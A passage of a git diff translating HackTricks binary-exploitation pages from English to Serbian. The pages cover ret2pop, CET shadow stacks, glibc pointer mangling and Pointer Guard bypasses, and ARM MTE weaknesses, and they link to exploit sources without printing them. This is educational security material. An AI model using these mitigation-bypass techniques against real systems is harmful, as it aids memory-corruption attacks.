[**in this one**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2retexploit.c) the exploit. +Prateći [**ovu vezu**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2ret.c) možete videti primer ranjivog binarnog fajla i [**u ovom**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2retexploit.c) eksploataciju. ## Ret2pop -In case you can find a **perfect pointer in the stack that you don't want to modify** (in `ret2ret` we changes the final lowest byte to `0x00`), you can perform the same `ret2ret` attack, but the **length of the RET sled must be shorted by 1** (so the final `0x00` overwrites the data just before the perfect pointer), and the **last** address of the RET sled must point to **`pop ; ret`**.\ -This way, the **data before the perfect pointer will be removed** from the stack (this is the data affected by the `0x00`) and the **final `ret` will point to the perfect address** in the stack without any change. +U slučaju da možete pronaći **savršeni pokazivač na steku koji ne želite da modifikujete** (u `ret2ret` menjamo poslednji najniži bajt u `0x00`), možete izvesti isti `ret2ret` napad, ali **dužina RET klizaljke mora biti skraćena za 1** (tako da konačni `0x00` prepisuje podatke neposredno pre savršenog pokazivača), a **poslednja** adresa RET klizaljke mora pokazivati na **`pop ; ret`**.\ +Na ovaj način, **podatak pre savršenog pokazivača biće uklonjen** sa steka (to su podaci pogođeni `0x00`) i **konačni `ret` će pokazivati na savršenu adresu** na steku bez ikakvih promena. -Following [**this link**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2pop.c) you can see an example of a vulnerable binary and [**in this one** ](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2popexploit.c)the exploit. +Prateći [**ovu vezu**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2pop.c) možete videti primer ranjivog binarnog fajla i [**u ovom**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2popexploit.c) eksploataciju. ## References diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md b/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md index 22e1edbc2..9a989da64 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md @@ -4,22 +4,22 @@ ## Control Flow Enforcement Technology (CET) -**CET** is a security feature implemented at the hardware level, designed to thwart common control-flow hijacking attacks such as **Return-Oriented Programming (ROP)** and **Jump-Oriented Programming (JOP)**. These types of attacks manipulate the execution flow of a program to execute malicious code or to chain together pieces of benign code in a way that performs a malicious action. +**CET** je bezbednosna funkcija implementirana na hardverskom nivou, dizajnirana da spreči uobičajene napade na preuzimanje toka kontrole kao što su **Return-Oriented Programming (ROP)** i **Jump-Oriented Programming (JOP)**. Ove vrste napada manipulišu tokom izvršavanja programa kako bi izvršile zlonamerni kod ili povezale delove benignog koda na način koji izvršava zlonamernu radnju. -CET introduces two main features: **Indirect Branch Tracking (IBT)** and **Shadow Stack**. +CET uvodi dve glavne funkcije: **Indirect Branch Tracking (IBT)** i **Shadow Stack**. -- **IBT** ensures that indirect jumps and calls are made to valid targets, which are marked explicitly as legal destinations for indirect branches. This is achieved through the use of a new instruction set that marks valid targets, thus preventing attackers from diverting the control flow to arbitrary locations. -- **Shadow Stack** is a mechanism that provides integrity for return addresses. It keeps a secured, hidden copy of return addresses separate from the regular call stack. When a function returns, the return address is validated against the shadow stack, preventing attackers from overwriting return addresses on the stack to hijack the control flow. +- **IBT** osigurava da se indirektni skokovi i pozivi vrše na validne ciljeve, koji su eksplicitno označeni kao legalne destinacije za indirektne grane. To se postiže korišćenjem novog skupa instrukcija koji označava validne ciljeve, čime se sprečava napadače da preusmere tok kontrole na proizvoljne lokacije. +- **Shadow Stack** je mehanizam koji pruža integritet za adrese povratka. Čuva sigurnu, skrivenu kopiju adresa povratka odvojenu od redovnog steka poziva. Kada funkcija vrati, adresa povratka se validira u odnosu na shadow stack, sprečavajući napadače da prepisuju adrese povratka na steku kako bi preuzeli tok kontrole. ## Shadow Stack -The **shadow stack** is a **dedicated stack used solely for storing return addresses**. It works alongside the regular stack but is protected and hidden from normal program execution, making it difficult for attackers to tamper with. The primary goal of the shadow stack is to ensure that any modifications to return addresses on the conventional stack are detected before they can be used, effectively mitigating ROP attacks. +**Shadow stack** je **posvećen stek koji se koristi isključivo za čuvanje adresa povratka**. Radi zajedno sa regularnim stekom, ali je zaštićen i skriven od normalnog izvršavanja programa, što otežava napadačima da ga manipulišu. Primarni cilj shadow stack-a je da osigura da se sve izmene adresa povratka na konvencionalnom steku otkriju pre nego što se mogu koristiti, efikasno ublažavajući ROP napade. -## How CET and Shadow Stack Prevent Attacks +## Kako CET i Shadow Stack Sprečavaju Napade -**ROP and JOP attacks** rely on the ability to hijack the control flow of an application by leveraging vulnerabilities that allow them to overwrite pointers or return addresses on the stack. By directing the flow to sequences of existing code gadgets or return-oriented programming gadgets, attackers can execute arbitrary code. +**ROP i JOP napadi** oslanjaju se na sposobnost preuzimanja toka kontrole aplikacije koristeći ranjivosti koje im omogućavaju da prepišu pokazivače ili adrese povratka na steku. Usmeravanjem toka ka sekvencama postojećih kodnih gadgeta ili gadgeta orijentisanih na povratak, napadači mogu izvršiti proizvoljan kod. -- **CET's IBT** feature makes these attacks significantly harder by ensuring that indirect branches can only jump to addresses that have been explicitly marked as valid targets. This makes it impossible for attackers to execute arbitrary gadgets spread across the binary. -- The **shadow stack**, on the other hand, ensures that even if an attacker can overwrite a return address on the normal stack, the **discrepancy will be detected** when comparing the corrupted address with the secure copy stored in the shadow stack upon returning from a function. If the addresses don't match, the program can terminate or take other security measures, preventing the attack from succeeding. +- **CET-ova IBT** funkcija čini ove napade značajno težim osiguravajući da indirektne grane mogu skakati samo na adrese koje su eksplicitno označene kao validni ciljevi. To čini nemogućim za napadače da izvrše proizvoljne gadgete raspoređene po binarnom kodu. +- **Shadow stack**, s druge strane, osigurava da čak i ako napadač može da prepiše adresu povratka na normalnom steku, **razlika će biti otkrivena** prilikom poređenja oštećene adrese sa sigurnom kopijom pohranjenom u shadow stack-u prilikom vraćanja iz funkcije. Ako se adrese ne poklapaju, program može da se završi ili preduzme druge bezbednosne mere, sprečavajući uspeh napada. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md b/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md index cacfd7f2f..dc7d72c40 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md @@ -1,82 +1,82 @@ -# Libc Protections +# Libc zaštite {{#include ../../banners/hacktricks-training.md}} -## Chunk Alignment Enforcement +## Sprovođenje poravnanja delova -**Malloc** allocates memory in **8-byte (32-bit) or 16-byte (64-bit) groupings**. This means the end of chunks in 32-bit systems should align with **0x8**, and in 64-bit systems with **0x0**. The security feature checks that each chunk **aligns correctly** at these specific locations before using a pointer from a bin. +**Malloc** alocira memoriju u **8-bajtnih (32-bitnih) ili 16-bajtnih (64-bitnih) grupama**. To znači da se kraj delova u 32-bitnim sistemima treba poravnati sa **0x8**, a u 64-bitnim sistemima sa **0x0**. Bezbednosna funkcija proverava da li se svaki deo **ispravno poravnava** na ovim specifičnim mestima pre nego što se koristi pokazivač iz kontejnera. -### Security Benefits +### Bezbednosne prednosti -The enforcement of chunk alignment in 64-bit systems significantly enhances Malloc's security by **limiting the placement of fake chunks to only 1 out of every 16 addresses**. This complicates exploitation efforts, especially in scenarios where the user has limited control over input values, making attacks more complex and harder to execute successfully. +Sprovođenje poravnanja delova u 64-bitnim sistemima značajno poboljšava bezbednost Malloc-a tako što **ograničava postavljanje lažnih delova na samo 1 od svake 16 adresa**. To otežava napade, posebno u scenarijima gde korisnik ima ograničenu kontrolu nad ulaznim vrednostima, čineći napade složenijim i težim za uspešnu realizaciju. -- **Fastbin Attack on \_\_malloc_hook** +- **Fastbin napad na \_\_malloc_hook** -The new alignment rules in Malloc also thwart a classic attack involving the `__malloc_hook`. Previously, attackers could manipulate chunk sizes to **overwrite this function pointer** and gain **code execution**. Now, the strict alignment requirement ensures that such manipulations are no longer viable, closing a common exploitation route and enhancing overall security. +Nova pravila poravnanja u Malloc-u takođe sprečavaju klasičan napad koji uključuje `__malloc_hook`. Prethodno su napadači mogli manipulisati veličinama delova da **prepišu ovu funkciju pokazivača** i dobiju **izvršenje koda**. Sada, strogi zahtevi za poravnanjem osiguravaju da takve manipulacije više nisu moguće, zatvarajući uobičajenu rutu eksploatacije i poboljšavajući ukupnu bezbednost. -## Pointer Mangling on fastbins and tcache +## Manipulacija pokazivačima na fastbins i tcache -**Pointer Mangling** is a security enhancement used to protect **fastbin and tcache Fd pointers** in memory management operations. This technique helps prevent certain types of memory exploit tactics, specifically those that do not require leaked memory information or that manipulate memory locations directly relative to known positions (relative **overwrites**). +**Manipulacija pokazivačima** je bezbednosno poboljšanje koje se koristi za zaštitu **fastbin i tcache Fd pokazivača** u operacijama upravljanja memorijom. Ova tehnika pomaže u sprečavanju određenih vrsta taktika eksploatacije memorije, posebno onih koje ne zahtevaju informacije o propuštenoj memoriji ili koje direktno manipulišu memorijskim lokacijama u odnosu na poznate pozicije (relativni **prepisivanja**). -The core of this technique is an obfuscation formula: +Osnova ove tehnike je formula obfuscacije: **`New_Ptr = (L >> 12) XOR P`** -- **L** is the **Storage Location** of the pointer. -- **P** is the actual **fastbin/tcache Fd Pointer**. +- **L** je **lokacija skladištenja** pokazivača. +- **P** je stvarni **fastbin/tcache Fd pokazivač**. -The reason for the bitwise shift of the storage location (L) by 12 bits to the right before the XOR operation is critical. This manipulation addresses a vulnerability inherent in the deterministic nature of the least significant 12 bits of memory addresses, which are typically predictable due to system architecture constraints. By shifting the bits, the predictable portion is moved out of the equation, enhancing the randomness of the new, mangled pointer and thereby safeguarding against exploits that rely on the predictability of these bits. +Razlog za pomeranje lokacije skladištenja (L) za 12 bita udesno pre XOR operacije je ključan. Ova manipulacija se bavi ranjivošću inherentnom determinističkoj prirodi najmanje značajnih 12 bita memorijskih adresa, koje su obično predvidljive zbog ograničenja arhitekture sistema. Pomeraanjem bitova, predvidljivi deo se izbacuje iz jednačine, povećavajući nasumičnost novog, izmenjenog pokazivača i time štiteći od eksploatacija koje se oslanjaju na predvidljivost ovih bitova. -This mangled pointer leverages the existing randomness provided by **Address Space Layout Randomization (ASLR)**, which randomizes addresses used by programs to make it difficult for attackers to predict the memory layout of a process. +Ovaj izmenjeni pokazivač koristi postojeću nasumičnost koju pruža **Randomizacija rasporeda adresnog prostora (ASLR)**, koja randomizuje adrese koje koriste programi kako bi otežala napadačima da predviđaju raspored memorije procesa. -**Demangling** the pointer to retrieve the original address involves using the same XOR operation. Here, the mangled pointer is treated as P in the formula, and when XORed with the unchanged storage location (L), it results in the original pointer being revealed. This symmetry in mangling and demangling ensures that the system can efficiently encode and decode pointers without significant overhead, while substantially increasing security against attacks that manipulate memory pointers. +**Demangling** pokazivača za vraćanje originalne adrese uključuje korišćenje iste XOR operacije. Ovde se izmenjeni pokazivač tretira kao P u formuli, a kada se XOR-uje sa nepromenjenom lokacijom skladištenja (L), rezultira otkrivanjem originalnog pokazivača. Ova simetrija u manipulaciji i demanipulaciji osigurava da sistem može efikasno kodirati i dekodirati pokazivače bez značajnog preopterećenja, dok značajno povećava bezbednost protiv napada koji manipulišu pokazivačima memorije. -### Security Benefits +### Bezbednosne prednosti -Pointer mangling aims to **prevent partial and full pointer overwrites in heap** management, a significant enhancement in security. This feature impacts exploit techniques in several ways: +Manipulacija pokazivačima ima za cilj da **spreči delimična i potpuna prepisivanja pokazivača u heap-u**, što je značajno poboljšanje u bezbednosti. Ova funkcija utiče na tehnike eksploatacije na nekoliko načina: -1. **Prevention of Bye Byte Relative Overwrites**: Previously, attackers could change part of a pointer to **redirect heap chunks to different locations without knowing exact addresses**, a technique evident in the leakless **House of Roman** exploit. With pointer mangling, such relative overwrites **without a heap leak now require brute forcing**, drastically reducing their likelihood of success. -2. **Increased Difficulty of Tcache Bin/Fastbin Attacks**: Common attacks that overwrite function pointers (like `__malloc_hook`) by manipulating fastbin or tcache entries are hindered. For example, an attack might involve leaking a LibC address, freeing a chunk into the tcache bin, and then overwriting the Fd pointer to redirect it to `__malloc_hook` for arbitrary code execution. With pointer mangling, these pointers must be correctly mangled, **necessitating a heap leak for accurate manipulation**, thereby elevating the exploitation barrier. -3. **Requirement for Heap Leaks in Non-Heap Locations**: Creating a fake chunk in non-heap areas (like the stack, .bss section, or PLT/GOT) now also **requires a heap leak** due to the need for pointer mangling. This extends the complexity of exploiting these areas, similar to the requirement for manipulating LibC addresses. -4. **Leaking Heap Addresses Becomes More Challenging**: Pointer mangling restricts the usefulness of Fd pointers in fastbin and tcache bins as sources for heap address leaks. However, pointers in unsorted, small, and large bins remain unmangled, thus still usable for leaking addresses. This shift pushes attackers to explore these bins for exploitable information, though some techniques may still allow for demangling pointers before a leak, albeit with constraints. +1. **Sprečavanje relativnih prepisivanja po bajtovima**: Prethodno su napadači mogli promeniti deo pokazivača da **preusmere delove heap-a na različite lokacije bez poznavanja tačnih adresa**, tehnika koja je očigledna u eksploataciji bez propuštanja **House of Roman**. Sa manipulacijom pokazivačima, takva relativna prepisivanja **bez propuštanja heap-a sada zahtevaju brute forcing**, drastično smanjujući verovatnoću uspeha. +2. **Povećana težina napada na Tcache Bin/Fastbin**: Uobičajeni napadi koji prepisuju funkcijske pokazivače (poput `__malloc_hook`) manipulacijom fastbin ili tcache unosa su otežani. Na primer, napad može uključivati propuštanje LibC adrese, oslobađanje dela u tcache bin, a zatim prepisivanje Fd pokazivača da ga preusmeri na `__malloc_hook` za proizvoljno izvršenje koda. Sa manipulacijom pokazivačima, ovi pokazivači moraju biti ispravno izmenjeni, **što zahteva propuštanje heap-a za tačnu manipulaciju**, čime se povećava barijera za eksploataciju. +3. **Zahtev za propuštanjem heap-a u ne-heap lokacijama**: Kreiranje lažnog dela u ne-heap oblastima (poput steka, .bss sekcije ili PLT/GOT) sada takođe **zahteva propuštanje heap-a** zbog potrebe za manipulacijom pokazivačima. Ovo povećava složenost eksploatacije ovih oblasti, slično zahtevu za manipulaciju LibC adresama. +4. **Propuštanje adresa heap-a postaje teže**: Manipulacija pokazivačima ograničava korisnost Fd pokazivača u fastbin i tcache binovima kao izvora za propuštanje adresa heap-a. Međutim, pokazivači u nesortiranim, malim i velikim binovima ostaju neizmenjeni, pa su i dalje upotrebljivi za propuštanje adresa. Ova promena podstiče napadače da istražuju ove binove za eksploatabilne informacije, iako neke tehnike mogu i dalje omogućiti demanipulaciju pokazivača pre propuštanja, iako sa ograničenjima. -### **Demangling Pointers with a Heap Leak** +### **Demanipulacija pokazivača sa propuštanjem heap-a** > [!CAUTION] -> For a better explanation of the process [**check the original post from here**](https://maxwelldulin.com/BlogPost?post=5445977088). +> Za bolje objašnjenje procesa [**proverite originalni post ovde**](https://maxwelldulin.com/BlogPost?post=5445977088). -### Algorithm Overview +### Pregled algoritma -The formula used for mangling and demangling pointers is: +Formula koja se koristi za manipulaciju i demanipulaciju pokazivača je: **`New_Ptr = (L >> 12) XOR P`** -Where **L** is the storage location and **P** is the Fd pointer. When **L** is shifted right by 12 bits, it exposes the most significant bits of **P**, due to the nature of **XOR**, which outputs 0 when bits are XORed with themselves. +Gde je **L** lokacija skladištenja, a **P** Fd pokazivač. Kada se **L** pomeri udesno za 12 bita, otkriva najznačajnije bitove **P**, zbog prirode **XOR**, koja daje 0 kada se bitovi XOR-uju sami sa sobom. -**Key Steps in the Algorithm:** +**Ključni koraci u algoritmu:** -1. **Initial Leak of the Most Significant Bits**: By XORing the shifted **L** with **P**, you effectively get the top 12 bits of **P** because the shifted portion of **L** will be zero, leaving **P's** corresponding bits unchanged. -2. **Recovery of Pointer Bits**: Since XOR is reversible, knowing the result and one of the operands allows you to compute the other operand. This property is used to deduce the entire set of bits for **P** by successively XORing known sets of bits with parts of the mangled pointer. -3. **Iterative Demangling**: The process is repeated, each time using the newly discovered bits of **P** from the previous step to decode the next segment of the mangled pointer, until all bits are recovered. -4. **Handling Deterministic Bits**: The final 12 bits of **L** are lost due to the shift, but they are deterministic and can be reconstructed post-process. +1. **Početno propuštanje najznačajnijih bitova**: XOR-ovanjem pomerene **L** sa **P**, efikasno dobijate gornjih 12 bitova **P** jer će pomerena deo **L** biti nula, ostavljajući odgovarajuće bitove **P** nepromenjenim. +2. **Obnova bitova pokazivača**: Pošto je XOR reverzibilan, poznavanje rezultata i jednog od operanada omogućava vam da izračunate drugi operand. Ova osobina se koristi za dedukciju celog skupa bitova za **P** sukcesivnim XOR-ovanjem poznatih skupova bitova sa delovima izmenjenog pokazivača. +3. **Iterativna demanipulacija**: Proces se ponavlja, svaki put koristeći novo otkrivene bitove **P** iz prethodnog koraka za dekodiranje sledećeg segmenta izmenjenog pokazivača, sve dok se svi bitovi ne obnove. +4. **Rukovanje determinističkim bitovima**: Poslednjih 12 bitova **L** se gubi zbog pomeranja, ali su deterministički i mogu se rekonstruisati nakon procesa. -You can find an implementation of this algorithm here: [https://github.com/mdulin2/mangle](https://github.com/mdulin2/mangle) +Možete pronaći implementaciju ovog algoritma ovde: [https://github.com/mdulin2/mangle](https://github.com/mdulin2/mangle) -## Pointer Guard +## Zaštita pokazivača -Pointer guard is an exploit mitigation technique used in glibc to protect stored function pointers, particularly those registered by library calls such as `atexit()`. This protection involves scrambling the pointers by XORing them with a secret stored in the thread data (`fs:0x30`) and applying a bitwise rotation. This mechanism aims to prevent attackers from hijacking control flow by overwriting function pointers. +Zaštita pokazivača je tehnika mitigacije eksploatacije koja se koristi u glibc-u za zaštitu skladištenih funkcijskih pokazivača, posebno onih registrovanih pozivima biblioteka kao što je `atexit()`. Ova zaštita uključuje mešanje pokazivača XOR-ovanjem sa tajnom koja se čuva u podacima niti (`fs:0x30`) i primenom bitovne rotacije. Ovaj mehanizam ima za cilj da spreči napadače da preuzmu kontrolu nad tokom izvršenja prepisivanjem funkcijskih pokazivača. -### **Bypassing Pointer Guard with a leak** +### **Obilaženje zaštite pokazivača sa propuštanjem** -1. **Understanding Pointer Guard Operations:** The scrambling (mangling) of pointers is done using the `PTR_MANGLE` macro which XORs the pointer with a 64-bit secret and then performs a left rotation of 0x11 bits. The reverse operation for recovering the original pointer is handled by `PTR_DEMANGLE`. -2. **Attack Strategy:** The attack is based on a known-plaintext approach, where the attacker needs to know both the original and the mangled versions of a pointer to deduce the secret used for mangling. -3. **Exploiting Known Plaintexts:** - - **Identifying Fixed Function Pointers:** By examining glibc source code or initialized function pointer tables (like `__libc_pthread_functions`), an attacker can find predictable function pointers. - - **Computing the Secret:** Using a known function pointer such as `__pthread_attr_destroy` and its mangled version from the function pointer table, the secret can be calculated by reverse rotating (right rotation) the mangled pointer and then XORing it with the address of the function. -4. **Alternative Plaintexts:** The attacker can also experiment with mangling pointers with known values like 0 or -1 to see if these produce identifiable patterns in memory, potentially revealing the secret when these patterns are found in memory dumps. -5. **Practical Application:** After computing the secret, an attacker can manipulate pointers in a controlled manner, essentially bypassing the Pointer Guard protection in a multithreaded application with knowledge of the libc base address and an ability to read arbitrary memory locations. +1. **Razumevanje operacija zaštite pokazivača:** Mešanje (manipulacija) pokazivača se vrši korišćenjem makroa `PTR_MANGLE` koji XOR-uje pokazivač sa 64-bitnom tajnom i zatim vrši levo pomeranje od 0x11 bitova. Obrnuta operacija za vraćanje originalnog pokazivača se obavlja pomoću `PTR_DEMANGLE`. +2. **Strategija napada:** Napad se zasniva na pristupu poznatom plain textu, gde napadač treba da zna i originalne i izmenjene verzije pokazivača da bi dedukovao tajnu korišćenu za mešanje. +3. **Eksploatacija poznatih plain textova:** +- **Identifikacija fiksnih funkcijskih pokazivača:** Istražujući izvorni kod glibc-a ili inicijalizovane tabele funkcijskih pokazivača (poput `__libc_pthread_functions`), napadač može pronaći predvidljive funkcijske pokazivače. +- **Izračunavanje tajne:** Koristeći poznati funkcijski pokazivač kao što je `__pthread_attr_destroy` i njegovu izmenjenu verziju iz tabele funkcijskih pokazivača, tajna se može izračunati obrnuto rotirajući (desno rotiranje) izmenjeni pokazivač i zatim XOR-ujući ga sa adresom funkcije. +4. **Alternativni plain textovi:** Napadač može takođe eksperimentisati sa mešanjem pokazivača sa poznatim vrednostima kao što su 0 ili -1 da vidi da li ove proizvode prepoznatljive obrasce u memoriji, potencijalno otkrivajući tajnu kada se ovi obrasci pronađu u dump-ovima memorije. +5. **Praktična primena:** Nakon izračunavanja tajne, napadač može manipulirati pokazivačima na kontrolisan način, suštinski obilažeći zaštitu pokazivača u višedretvenoj aplikaciji sa znanjem o osnovnoj adresi libc-a i sposobnošću čitanja proizvoljnih memorijskih lokacija. -## References +## Reference - [https://maxwelldulin.com/BlogPost?post=5445977088](https://maxwelldulin.com/BlogPost?post=5445977088) - [https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html?m=1](https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html?m=1) diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md b/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md index 43980bbca..b4802e27e 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md @@ -2,82 +2,80 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -**Memory Tagging Extension (MTE)** is designed to enhance software reliability and security by **detecting and preventing memory-related errors**, such as buffer overflows and use-after-free vulnerabilities. MTE, as part of the **ARM** architecture, provides a mechanism to attach a **small tag to each memory allocation** and a **corresponding tag to each pointer** referencing that memory. This approach allows for the detection of illegal memory accesses at runtime, significantly reducing the risk of exploiting such vulnerabilities for executing arbitrary code. +**Memory Tagging Extension (MTE)** je dizajniran da poboljša pouzdanost i sigurnost softvera tako što **otkriva i sprečava greške povezane sa memorijom**, kao što su buffer overflows i use-after-free ranjivosti. MTE, kao deo **ARM** arhitekture, pruža mehanizam za pridruživanje **malog taga svakoj alokaciji memorije** i **odgovarajućeg taga svakom pokazivaču** koji referencira tu memoriju. Ovaj pristup omogućava otkrivanje ilegalnih pristupa memoriji u vreme izvođenja, značajno smanjujući rizik od iskorišćavanja takvih ranjivosti za izvršavanje proizvoljnog koda. -### **How Memory Tagging Extension Works** +### **Kako funkcioniše Memory Tagging Extension** -MTE operates by **dividing memory into small, fixed-size blocks, with each block assigned a tag,** typically a few bits in size. +MTE funkcioniše tako što **deliti memoriju na male, fiksne blokove, pri čemu je svaki blok dodeljen tag,** obično veličine nekoliko bita. -When a pointer is created to point to that memory, it gets the same tag. This tag is stored in the **unused bits of a memory pointer**, effectively linking the pointer to its corresponding memory block. +Kada se kreira pokazivač koji pokazuje na tu memoriju, dobija isti tag. Ovaj tag se čuva u **neiskorišćenim bitovima pokazivača u memoriji**, efektivno povezujući pokazivač sa odgovarajućim memorijskim blokom.

https://www.youtube.com/watch?v=UwMt0e_dC_Q

-When a program accesses memory through a pointer, the MTE hardware checks that the **pointer's tag matches the memory block's tag**. If the tags **do not match**, it indicates an **illegal memory access.** +Kada program pristupa memoriji putem pokazivača, MTE hardver proverava da li **tag pokazivača odgovara tagu memorijskog bloka**. Ako se tagovi **ne poklapaju**, to ukazuje na **ilegalan pristup memoriji.** -### MTE Pointer Tags +### MTE Tagovi Pokazivača -Tags inside a pointer are stored in 4 bits inside the top byte: +Tagovi unutar pokazivača se čuvaju u 4 bita unutar gornjeg bajta:

https://www.youtube.com/watch?v=UwMt0e_dC_Q

-Therefore, this allows up to **16 different tag values**. +Stoga, ovo omogućava do **16 različitih vrednosti taga**. -### MTE Memory Tags +### MTE Tagovi Memorije -Every **16B of physical memory** have a corresponding **memory tag**. +Svaka **16B fizičke memorije** ima odgovarajući **tag memorije**. -The memory tags are stored in a **dedicated RAM region** (not accessible for normal usage). Having 4bits tags for every 16B memory tags up to 3% of RAM. - -ARM introduces the following instructions to manipulate these tags in the dedicated RAM memory: +Tagovi memorije se čuvaju u **posvećenoj RAM oblasti** (koja nije dostupna za normalnu upotrebu). Imajući 4bita tagove za svaki 16B tag memorije do 3% RAM-a. +ARM uvodi sledeće instrukcije za manipulaciju ovim tagovima u posvećenoj RAM memoriji: ``` STG [], # Store Allocation (memory) Tag LDG , [] Load Allocatoin (memory) Tag IRG , Insert Random [pointer] Tag ... ``` +## Proveravanje režima -## Checking Modes +### Sinhrono -### Sync +CPU proverava oznake **tokom izvršavanja instrukcija**, ako dođe do neslaganja, podiže izuzetak.\ +Ovo je najsporije i najbezbednije. -The CPU check the tags **during the instruction executing**, if there is a mismatch, it raises an exception.\ -This is the slowest and most secure. +### Asinhrono -### Async +CPU proverava oznake **asinhrono**, i kada se pronađe neslaganje, postavlja bit izuzetka u jednom od sistemskih registara. To je **brže** od prethodnog, ali je **nesposobno da ukaže** na tačnu instrukciju koja je izazvala neslaganje i ne podiže izuzetak odmah, dajući malo vremena napadaču da završi svoj napad. -The CPU check the tags **asynchronously**, and when a mismatch is found it sets an exception bit in one of the system registers. It's **faster** than the previous one but it's **unable to point out** the exact instruction that cause the mismatch and it doesn't raise the exception immediately, giving some time to the attacker to complete his attack. - -### Mixed +### Mešano ??? -## Implementation & Detection Examples +## Primeri implementacije i detekcije -Called Hardware Tag-Based KASAN, MTE-based KASAN or in-kernel MTE.\ -The kernel allocators (like `kmalloc`) will **call this module** which will prepare the tag to use (randomly) attach it to the kernel space allocated and to the returned pointer. +Naziva se Hardware Tag-Based KASAN, MTE-based KASAN ili in-kernel MTE.\ +Kernel alokatori (kao što je `kmalloc`) će **pozvati ovaj modul** koji će pripremiti oznaku za korišćenje (slučajno) i prikačiti je na alocirani kernel prostor i na vraćeni pokazivač. -Note that it'll **only mark enough memory granules** (16B each) for the requested size. So if the requested size was 35 and a slab of 60B was given, it'll mark the first 16\*3 = 48B with this tag and the **rest** will be **marked** with a so-called **invalid tag (0xE)**. +Napomena: **označiće samo dovoljno memorijskih granula** (16B svaka) za traženu veličinu. Dakle, ako je tražena veličina bila 35, a data je granula od 60B, označiće prvih 16\*3 = 48B ovom oznakom, a **ostatak** će biti **označen** takozvanom **nevažećom oznakom (0xE)**. -The tag **0xF** is the **match all pointer**. A memory with this pointer allows **any tag to be used** to access its memory (no mismatches). This could prevent MET from detecting an attack if this tags is being used in the attacked memory. +Oznaka **0xF** je **pokazivač koji se poklapa sa svime**. Memorija sa ovom oznakom omogućava **bilo koju oznaku da se koristi** za pristup njenoj memoriji (bez neslaganja). Ovo bi moglo sprečiti MET da detektuje napad ako se ove oznake koriste u napadnutoj memoriji. -Therefore there are only **14 value**s that can be used to generate tags as 0xE and 0xF are reserved, giving a probability of **reusing tags** to 1/17 -> around **7%**. +Stoga postoji samo **14 vrednosti** koje se mogu koristiti za generisanje oznaka, jer su 0xE i 0xF rezervisane, što daje verovatnoću **ponovne upotrebe oznaka** od 1/17 -> oko **7%**. -If the kernel access to the **invalid tag granule**, the **mismatch** will be **detected**. If it access another memory location, if the **memory has a different tag** (or the invalid tag) the mismatch will be **detected.** If the attacker is lucky and the memory is using the same tag, it won't be detected. Chances are around 7% +Ako kernel pristupi **nevažećoj granuli oznake**, **neslaganje** će biti **detektovano**. Ako pristupi drugoj memorijskoj lokaciji, ako **memorija ima drugačiju oznaku** (ili nevažeću oznaku), neslaganje će biti **detektovano**. Ako je napadač srećan i memorija koristi istu oznaku, to neće biti detektovano. Šanse su oko 7%. -Another bug occurs in the **last granule** of the allocated memory. If the application requested 35B, it was given the granule from 32 to 48. Therefore, the **bytes from 36 til 47 are using the same tag** but they weren't requested. If the attacker access **these extra bytes, this isn't detected**. +Još jedna greška se javlja u **poslednjoj granuli** alocirane memorije. Ako je aplikacija tražila 35B, data je granula od 32 do 48. Stoga, **bajti od 36 do 47 koriste istu oznaku** ali nisu traženi. Ako napadač pristupi **ovim dodatnim bajtovima, to neće biti detektovano**. -When **`kfree()`** is executed, the memory is retagged with the invalid memory tag, so in a **use-after-free**, when the memory is accessed again, the **mismatch is detected**. +Kada se izvrši **`kfree()`**, memorija se ponovo označava nevažećom memorijskom oznakom, tako da u **upotrebi nakon oslobađanja**, kada se memorija ponovo pristupi, **neslaganje se detektuje**. -However, in a use-after-free, if the same **chunk is reallocated again with the SAME tag** as previously, an attacker will be able to use this access and this won't be detected (around 7% chance). +Međutim, u upotrebi nakon oslobađanja, ako se isti **deo ponovo alocira sa ISTOM oznakom** kao prethodno, napadač će moći da iskoristi ovaj pristup i to neće biti detektovano (oko 7% šanse). -Moreover, only **`slab` and `page_alloc`** uses tagged memory but in the future this will also be used in `vmalloc`, `stack` and `globals` (at the moment of the video these can still be abused). +Štaviše, samo **`slab` i `page_alloc`** koriste označenu memoriju, ali će se u budućnosti ovo takođe koristiti u `vmalloc`, `stack` i `globals` (u trenutku snimanja videa, ove se još uvek mogu zloupotrebiti). -When a **mismatch is detected** the kernel will **panic** to prevent further exploitation and retries of the exploit (MTE doesn't have false positives). +Kada se **neslaganje detektuje**, kernel će **panikovati** kako bi 